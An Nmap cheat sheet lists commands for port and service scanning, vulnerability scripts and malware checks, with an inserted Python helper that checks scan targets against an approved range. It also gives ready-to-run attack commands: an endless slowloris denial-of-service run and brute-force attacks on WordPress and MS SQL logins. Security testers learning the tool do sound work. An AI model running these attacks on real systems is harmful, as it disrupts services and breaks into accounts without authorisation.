Use Nmap to Scan Ports (cheat sheet)

1.Basic scan

nmap 41.22.10.1

nmap yourdomain.com

2.Scan specific ports

nmap -p 1-65535 41.22.10.1

nmap -p 1,443 41.22.10.1

3.Scan multiple IPs

nmap 1.1.1.1 1.1.1.2

nmap 1.1.1.1,2,3,4

(This will scan 1.1.1.1 1.1.1.2 1.1.1.3 1.1.1.4)

nmap 1.1.1.1-4

nmap 1.1.1.*

nmap 1.1.1.0/28
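The target forms above expand to very different host counts, so it is worth listing what a spec covers and comparing it with the approved range before any packet is sent. The following is an added example, not part of the original cheat sheet; the function names and the approved range are assumptions made for illustration, and only IPv4 literals are handled.

```python
import ipaddress
from itertools import product


def expand_octet(spec):
    """Expand one octet spec: '1', '1-4', '1,2,3,4', '*' or an open range like '-'."""
    values = set()
    for part in spec.split(","):
        if part == "*":
            lo, hi = 0, 255
        elif "-" in part:
            lo_s, hi_s = part.split("-", 1)
            lo = int(lo_s) if lo_s else 0      # omitted left side defaults to 0
            hi = int(hi_s) if hi_s else 255    # omitted right side defaults to 255
        else:
            lo = hi = int(part)
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad octet range: {part!r}")
        values.update(range(lo, hi + 1))
    return sorted(values)


def expand_target(spec):
    """Return every IPv4 address covered by one Nmap-style target spec."""
    if "/" in spec:
        # CIDR targets cover all addresses, network and broadcast included.
        return [str(ip) for ip in ipaddress.ip_network(spec, strict=False)]
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 target spec: {spec!r}")
    return [".".join(map(str, combo))
            for combo in product(*(expand_octet(o) for o in octets))]


def out_of_scope(specs, allowed_cidr):
    """List addresses the specs would touch that fall outside the approved range."""
    allowed = ipaddress.ip_network(allowed_cidr)
    return [ip for s in specs for ip in expand_target(s)
            if ipaddress.ip_address(ip) not in allowed]


if __name__ == "__main__":
    approved = "1.1.1.0/28"  # constructed example of an approved range
    for spec in ["1.1.1.1,2,3,4", "1.1.1.1-4", "1.1.1.*", "1.1.1.0/28"]:
        hosts = expand_target(spec)
        extra = out_of_scope([spec], approved)
        print(f"{spec:15} {len(hosts):4} hosts, {len(extra):4} outside {approved}")
```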

4.Scan popular ports

nmap --top-ports 20 1.1.1.1

(Scans the 20 most common ports on 1.1.1.1)

5.Scan target from a file

nmap -iL list.txt

6.Scan with service detection

nmap -A -T4 1.1.1.1

(-A enables service/version detection, along with OS detection, script scanning and traceroute. -T4 uses a faster timing template to speed up the scan)

7.Detect Service/Daemon

nmap -sV 1.1.1.1

8.Scan using UDP/TCP

nmap -sT 1.1.1.1

(For TCP)

nmap -sU 1.1.1.1

(For UDP)

9.Vulnerability detection

nmap -Pn --script vuln 1.1.1.1

10.Launch DoS attack

nmap 1.1.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

11.Launch brute-force attacks

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 1.1.1.1

(WordPress brute-force attack)

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 1.1.1.1

(MS SQL brute-force attack)

12.Detect malware infections

nmap -sV --script=http-malware-host 1.1.1.1

nmap -p80 --script http-google-malware 1.1.1.1

(Google malware check)
